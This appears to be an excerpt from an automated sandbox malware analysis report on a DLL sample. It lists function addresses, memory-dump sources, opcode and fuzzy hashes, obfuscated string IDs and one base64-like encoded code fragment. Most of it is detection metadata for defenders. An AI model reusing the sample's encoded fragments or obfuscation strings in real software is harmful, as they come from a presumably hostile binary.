                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: cyyhbffs$stwsqmsgjauqasxuantpzy$vwzpgfulg
                                                                                                                                                                              • API String ID: 0-3986507978
                                                                                                                                                                              • Opcode ID: eee68d661bf4387bd5b453112471402407a4eaa65b031436b726286e9602d071
                                                                                                                                                                              • Instruction ID: ac103316c46f4feaa6ad5732ec6ff5479671d5090438e9f172ec613ed05fdca1
                                                                                                                                                                              • Opcode Fuzzy Hash: eee68d661bf4387bd5b453112471402407a4eaa65b031436b726286e9602d071
                                                                                                                                                                              • Instruction Fuzzy Hash: 5BA1F3725087428FCB08EF38C59429BBBF2AFC6350F019A1DE5A18B690DB35D948CB43
                                                                                                                                                                              Function 6D5C87A0 Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :`z$:`z$2f
                                                                                                                                                                              • API String ID: 0-3157315960
                                                                                                                                                                              • Opcode ID: 940eda039a5301e00500aefc71337491d52982c9ace8ba83ab78af4ada1bd6cb
                                                                                                                                                                              • Instruction ID: 9d3607a5539f8038d81da55c04a7f15f7f71fc5f150134fb38c54b14349c6e9b
                                                                                                                                                                              • Opcode Fuzzy Hash: 940eda039a5301e00500aefc71337491d52982c9ace8ba83ab78af4ada1bd6cb
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E81D271A546168FCF09CEFCC8953EF7FB1AB46320F148D1ED9209BB90C62A95458B93
                                                                                                                                                                              Function 6D5C4B00 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: )iK$pl/${/@?
                                                                                                                                                                              • API String ID: 0-2790675580
                                                                                                                                                                              • Opcode ID: 236d536e30ce7ca58a015b2f5734acecf1e037634d72b239917699c0460891c2
                                                                                                                                                                              • Instruction ID: 6ef5d3cdec4279edc1179992d264db90f5c47f0a40600f21d7d2f3b19191c3a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 236d536e30ce7ca58a015b2f5734acecf1e037634d72b239917699c0460891c2
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E51E672E541068FCF0DDEECC581BEEB7F6AB4E354F108519E410EB750C62AAD498B92
                                                                                                                                                                              Function 6D5C8C80 Relevance: 3.2, Strings: 2, Instructions: 745COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: tf$tf
                                                                                                                                                                              • API String ID: 0-36353575
                                                                                                                                                                              • Opcode ID: 3235276ad66876301af996d0f8d3fd3876b99708063726029634f37aaa3d3cd0
                                                                                                                                                                              • Instruction ID: 89266e03f11bd0c529e50680d697179e8314ffe61754e0fa4b79f6d8f6f25e68
                                                                                                                                                                              • Opcode Fuzzy Hash: 3235276ad66876301af996d0f8d3fd3876b99708063726029634f37aaa3d3cd0
                                                                                                                                                                              • Instruction Fuzzy Hash: 4942F07AA502458FCF09CEECD4D57DE7BF2BB46315F10891ED422EBB94C63598868B02
                                                                                                                                                                              Function 6D5B4510 Relevance: 3.1, Strings: 2, Instructions: 569COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Yzi|$vshoyrrcntgkzwpltrcgzoklcyfyoqobmuulgety
                                                                                                                                                                              • API String ID: 0-708493925
                                                                                                                                                                              • Opcode ID: ddfb1d1e83511f7b64cb5830e96af53f816a2a355607f64cafb0c3a585a21e8f
                                                                                                                                                                              • Instruction ID: b167814240a26e81ab7d499a43e458c8473cc18fd1691fabbe701ba15988b511
                                                                                                                                                                              • Opcode Fuzzy Hash: ddfb1d1e83511f7b64cb5830e96af53f816a2a355607f64cafb0c3a585a21e8f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6112F276694A018FC729CE2CC5A53A777E2BB4A354F008E1DD466CBFA4C636F849CB41
                                                                                                                                                                              Function 6D5B2B70 Relevance: 3.0, Strings: 2, Instructions: 548COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :.JR$tbsrzqfsnnnjozhbsllbroupropwkpvgyuwzfjrerzcdcmoqgpjztdvzjcbjcstlulzgtkvxxafflcneqdtpwlep
                                                                                                                                                                              • API String ID: 0-4013670861
                                                                                                                                                                              • Opcode ID: 64088e85a06774ec606d7621ade3f273a709fd947bbbd4208fb77f38572d15cb
                                                                                                                                                                              • Instruction ID: d563eec77b73d08669234f32a22182103ee3fa5cefdc5a04ff3b581c05ffad3b
                                                                                                                                                                              • Opcode Fuzzy Hash: 64088e85a06774ec606d7621ade3f273a709fd947bbbd4208fb77f38572d15cb
                                                                                                                                                                              • Instruction Fuzzy Hash: F712CE72A582058FDB2DDEBCC4A43DE7BF1BB46350F209929C425EBA95CB359909CF01
                                                                                                                                                                              Function 6D5C9790 Relevance: 3.0, Strings: 2, Instructions: 547COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: )Ug$|
                                                                                                                                                                              • API String ID: 0-1604100730
                                                                                                                                                                              • Opcode ID: 9cefcd60471377612cd7c8c76d32492e7b57af047ad4263ab479302070b6e9e8
                                                                                                                                                                              • Instruction ID: a8f14e9da492333d4cd390268b15a0a53313939495d0bbedaeb2abea3e8f5f5f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cefcd60471377612cd7c8c76d32492e7b57af047ad4263ab479302070b6e9e8
                                                                                                                                                                              • Instruction Fuzzy Hash: AB12E336AA91059FCB0ACEFCD6817DD7BF2BB4635AF108919E801E7B44C77989058F42
                                                                                                                                                                              Function 6D5C22C0 Relevance: 2.9, Strings: 2, Instructions: 409COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Zl$y
                                                                                                                                                                              • API String ID: 0-3501366969
                                                                                                                                                                              • Opcode ID: a237bb2759f4f7c9fc12af01bed932914ce660087eee517624d58d13ead5fe00
                                                                                                                                                                              • Instruction ID: 72e6c57a8befe2b670b88cf25ff4707923ffcd319569b2d38fd869cc636bdf85
                                                                                                                                                                              • Opcode Fuzzy Hash: a237bb2759f4f7c9fc12af01bed932914ce660087eee517624d58d13ead5fe00
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CE18975E542099FCB2DCEECD5907DDBBF1BB4A340F10E819E424EBA54C63998098F26
                                                                                                                                                                              Function 6D5B3FE0 Relevance: 2.8, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: :$kdeshsbvkrxouoioooyyrfxvggianzzimqzltffojohbbplbnljjkcd
                                                                                                                                                                              • API String ID: 0-2150965277
                                                                                                                                                                              • Opcode ID: 9e312853b6745cebc5390087c2cd3b02b739a130da47bae5b1614672461c194c
                                                                                                                                                                              • Instruction ID: 265079f463b7da73bc7727daf1107842ac223f6dac416814d6b2ee9c59dc4fd3
                                                                                                                                                                              • Opcode Fuzzy Hash: 9e312853b6745cebc5390087c2cd3b02b739a130da47bae5b1614672461c194c
                                                                                                                                                                              • Instruction Fuzzy Hash: 32C1CC756587428FC718CE7CC4E47AABBE1BB9A348F008E1DE091CBA94D735C9498B43
                                                                                                                                                                              Function 6D5C53B0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: cG~j
                                                                                                                                                                              • API String ID: 0-1641660554
                                                                                                                                                                              • Opcode ID: fd29021feea7f280ca2353b3b69a52630c56df1e52a1f369a7b4d1bf92aa138c
                                                                                                                                                                              • Instruction ID: c5b0074da556f456b5a5fa178fce67058d9c12fec167281c769d71a851d40a83
                                                                                                                                                                              • Opcode Fuzzy Hash: fd29021feea7f280ca2353b3b69a52630c56df1e52a1f369a7b4d1bf92aa138c
                                                                                                                                                                              • Instruction Fuzzy Hash: DF121336A54205CFCB0ACEFCC5D43ED7BF2FB56364F209909E411DBB94C625A94A8B02
                                                                                                                                                                              Function 6D5D9D15 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D5D9D10,?,?,00000008,?,?,6D5D9913,00000000), ref: 6D5D9F42
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                              • Opcode ID: db4a2417f9e652e8a13f0808cce3fb6da1843abfd436b3bca819612d257bb209
                                                                                                                                                                              • Instruction ID: 08081ef8d72373db5ee64730db1d6e61225ca1085be5687f0ada33b305a8f86a
                                                                                                                                                                              • Opcode Fuzzy Hash: db4a2417f9e652e8a13f0808cce3fb6da1843abfd436b3bca819612d257bb209
                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB14B3122060A9FD749CF2CC496B647BE0FF45364F258A58E8A9CF6A1C335DA91CF54
                                                                                                                                                                              Function 6D5C8110 Relevance: 1.7, Strings: 1, Instructions: 463COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: q&[`
                                                                                                                                                                              • API String ID: 0-3673868144
                                                                                                                                                                              • Opcode ID: abfc44d0284ea234d7c6474c746ca8f83eac78b3132f41e7538dceb9260eba9b
                                                                                                                                                                              • Instruction ID: e892c48c18632fc3dc37ce4c9f0278c6e7a62e6b41369ad2e96664c396dba50b
                                                                                                                                                                              • Opcode Fuzzy Hash: abfc44d0284ea234d7c6474c746ca8f83eac78b3132f41e7538dceb9260eba9b
                                                                                                                                                                              • Instruction Fuzzy Hash: 63F1FF36A542059FCB09CEBCD9807DD7BF2AB8A350F04C919E825E7750D63A9908DF17
                                                                                                                                                                              Function 6D5C5F50 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #V[
                                                                                                                                                                              • API String ID: 0-2871392821
                                                                                                                                                                              • Opcode ID: de38b318f66286055d390a34cc95832c0b625e3566e604d0d903747535fae41b
                                                                                                                                                                              • Instruction ID: 7de4d9edbfb087d590c0317f71e969115db01ded7af696af018cdece0de54a33
                                                                                                                                                                              • Opcode Fuzzy Hash: de38b318f66286055d390a34cc95832c0b625e3566e604d0d903747535fae41b
                                                                                                                                                                              • Instruction Fuzzy Hash: A102AD75A542098FCB09CFACC5947EDBBF1BF46310F10881EE815ABB64D7399A45CB82
                                                                                                                                                                              Function 6D5CDBC8 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D5CDBDE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                              • Opcode ID: ffe6372982514933b1add7966e14ce4d45037bdbf5d741d11fc29c5b041c6785
                                                                                                                                                                              • Instruction ID: 7b050187f8c09a51f9ac305ed46aa6e883af7db838e53216dac758bd9f71f47c
                                                                                                                                                                              • Opcode Fuzzy Hash: ffe6372982514933b1add7966e14ce4d45037bdbf5d741d11fc29c5b041c6785
                                                                                                                                                                              • Instruction Fuzzy Hash: 9251B0B1E512068FEB18DF95C8817AEBBF1FB89304F20C92EC415EB250E3759980CB51
                                                                                                                                                                              Function 6D5D38ED Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 32632bcf67d2be58eed90dc7a48b7b4804170544bcc064725aca7a4c78b380f5
                                                                                                                                                                              • Instruction ID: 5cdf9bdb563d506c80764df32595f3e8a53a8260aebdaab5b58f956b5bbca97a
                                                                                                                                                                              • Opcode Fuzzy Hash: 32632bcf67d2be58eed90dc7a48b7b4804170544bcc064725aca7a4c78b380f5
                                                                                                                                                                              • Instruction Fuzzy Hash: DA41C4B580921DAFEB54DF6DCC88AAAB7B9AF45304F1442DDE419E3200DB319E848F24
                                                                                                                                                                              Function 6D5BA9F0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • pCQAAikYpiEX/U41F/1CLz+gXCQAAikYqiEX/U41F/1CLz+gFCQAAikYriEX/U41F/1CLz+jzCAAAikYwiEX/U41F/1CLz+jhCAAAikYxiEX/U41F/1CLz+jPCAAAikYyi, xrefs: 6D5BAA49, 6D5BAB8D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: pCQAAikYpiEX/U41F/1CLz+gXCQAAikYqiEX/U41F/1CLz+gFCQAAikYriEX/U41F/1CLz+jzCAAAikYwiEX/U41F/1CLz+jhCAAAikYxiEX/U41F/1CLz+jPCAAAikYyi
                                                                                                                                                                              • API String ID: 0-1372142962
